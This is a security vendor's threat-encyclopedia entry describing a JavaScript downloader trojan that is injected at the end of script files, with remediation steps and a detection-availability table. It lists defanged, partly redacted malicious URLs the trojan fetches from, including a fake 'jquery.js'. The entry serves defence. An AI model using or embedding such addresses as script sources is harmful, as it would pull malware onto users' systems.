JS/Agent.DVU!tr
Analysis
JS/Agent.DVU!tr is a generic detection for a type of Javascript downloader trojan. Since this is a generic detection, this malware may have varying behaviour.
Below are some of its observed characteristics/behaviours:
- The Javascript contains a malicious part which is most likely injected to the end of the Javascript file.
The Javascript connects to the following malicious URL which contains another Javascript:
- hxxp://13{Removed}.249.116.78/jquery.js
- The connected Javascript attempts to connect to the following URL rated as malicious:
- hxxps://www.cpm2{Removed}.com/watch?key=789a4129e78c00008a47b36e23d65ea7
Recommended Action
- Make sure that your FortiGate/FortiClient system is using the latest AV database.
- Quarantine/delete files that are detected and replace infected files with clean backup copies.
Telemetry
Detection Availability
FortiClient | |
---|---|
Extreme | |
FortiMail | |
Extreme | |
FortiSandbox | |
Extreme | |
FortiWeb | |
Extreme | |
Web Application Firewall | |
Extreme | |
FortiIsolator | |
Extreme | |
FortiDeceptor | |
Extreme | |
FortiEDR |